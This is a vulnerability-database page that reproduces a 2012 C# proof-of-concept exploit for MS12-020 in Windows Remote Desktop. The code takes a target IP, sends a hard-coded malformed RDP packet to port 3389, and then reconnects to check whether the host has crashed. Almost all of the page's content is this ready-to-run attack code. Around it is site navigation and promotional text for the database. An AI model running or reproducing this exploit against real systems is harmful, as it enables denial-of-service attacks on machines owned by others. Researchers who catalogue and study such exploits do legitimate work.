Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft windows remote desktop PoC C# Exploit

🗓️ 12 Dec 2012 00:00:00Reported by patachiType 
zdt
 zdt🔗 0day.today👁 47 Views

Microsoft Windows Remote Desktop PoC C# Exploit for MS12-020 vulnerabilit

Code
//ms12-020 "chinese shit" PoC
//Tested On Win7 Ultimate & Win 2008 Server & Win 2003 Serrver R2
//C# Coded By Yomi :D

using System;
using System.Net;
using System.Net.Sockets;

namespace RDP_PoC_Exploit
{
    class Program
    {
        public static readonly string str_shell =
"030000130ee00000" +"0000000100080000" +"000000030001d602" +"f0807f6582019404" +"01010401010101ff" +"3019020400000000" +
"0204000000020204" +"0000000002040000" +"0001020400000000" +"0204000000010202" +"ffff020400000002" +"3019020400000001" +
"0204000000010204" +"0000000102040000" +"0001020400000000" +"0204000000010202" +"0420020400000002" +"301c0202ffff0202" +
"fc170202ffff0204" +"0000000102040000" +"0000020400000001" +"0202ffff02040000" +"0002048201330005" +"00147c0001812a00" +
"0800100001c00044" +"756361811c01c0d8" +"00040008008002e0" +"0101ca03aa090400" +"00ce0e000048004f" +"0053005400000000" +
"0000000000000000" +"0000000000000000" +"0000000000040000" +"00000000000c0000" +"0000000000000000" +"0000000000000000" +
"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +
"0001ca0100000000" +"0010000700010030" +"0030003000300030" +"002d003000300030" +"002d003000300030" +"0030003000300030" +
"002d003000300030" +"0030003000000000" +"0000000000000000" +"0000000000000000" +"000000000004c00c" +"000d000000000000" +
"0002c00c001b0000" +"000000000003c02c" +"0003000000726470" +"6472000000000080" +"80636c6970726472" +"000000a0c0726470" +
"736e640000000000" +"c00300000c02f080" +"0401000100030000" +"0802f08028030000" +"0c02f08038000603" +"ef0300000c02f080" +
"38000603eb030000" +"0c02f08038000603" +"ec0300000c02f080" +"38000603ed030000" +"0c02f08038000603" +"ee0300000b06d000" +
"00123400";
           
        static void Main(string[] args)
        {
            Console.WriteLine("Enter Remote IP : <192.168.1.1> <Enter To Start :D>");
            string str_IP = Console.ReadLine();
			
			Exploit_it(str_IP);
			
        }

        static private void Exploit_it(string IP)
        {
            try
            {
                Socket _soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
                IPAddress remoteIPAddress = IPAddress.Parse(IP);
                IPEndPoint remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
                _soc.Connect(remoteEndPoint);
                Console.WriteLine(".............. Creating Paylod ");
                byte[] buff = HexString2Bytes(str_shell);
                Console.WriteLine(".............. Sending Payload ");
                _soc.Send(buff);
                Console.WriteLine(".............. Payoad Sent ! ");
                Console.WriteLine(".............. Reconnecting To Remote Target ! ");
                _soc.Disconnect(true);

                try
                {
					
						Socket re_soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
						IPAddress re_remoteIPAddress = IPAddress.Parse(IP);
						IPEndPoint re_remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
						re_soc.Connect(re_remoteEndPoint);
						Console.WriteLine(".............. Remote Host Responding ! :( ");
						Console.WriteLine(".............. Exploit Faild ! :( ");
					
                }
                catch (System.Net.Sockets.SocketException Exp)
                {
                    Console.WriteLine(".............. Remote Host Not Response ! :D");
                    Console.WriteLine(".............. Exploit Success !! \r\nSocket Error : [ " + Exp.Message + " ]");
                }

                Console.WriteLine(".............. Exploit Done ! \r\n.............. Check Result Of It !");
            }
            catch (System.Net.Sockets.SocketException se)
            {
                Console.WriteLine(".............. Exploit Faild !");
                Console.WriteLine("Socket Error : [ " + se.Message + " ]");
            }
        }

        static private byte[] HexString2Bytes(string hexString)
        {
            int len = hexString.Length;
            if (len % 2 == 1) throw new Exception("Invalid  HEX String Length !");
            int len_half = len / 2;
            byte[] arr_b = new byte[len_half];
            for (int i = 0; i != len_half; i++)
            {
                arr_b[i] = (byte)Int32.Parse(hexString.Substring(i * 2, 2), System.Globalization.NumberStyles.HexNumber);
            }
            return arr_b;
        }
    }
}

#  0day.today [2018-02-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Dec 2012 00:00Current
7.1High risk
Vulners AI Score7.1
microsoft windowsremote desktoppoc exploitms12-020c# codedyomiwin7 ultimatewin 2008 serverwin 2003 serrver r2socketaddressfamilyipaddressipendpointremote ip
47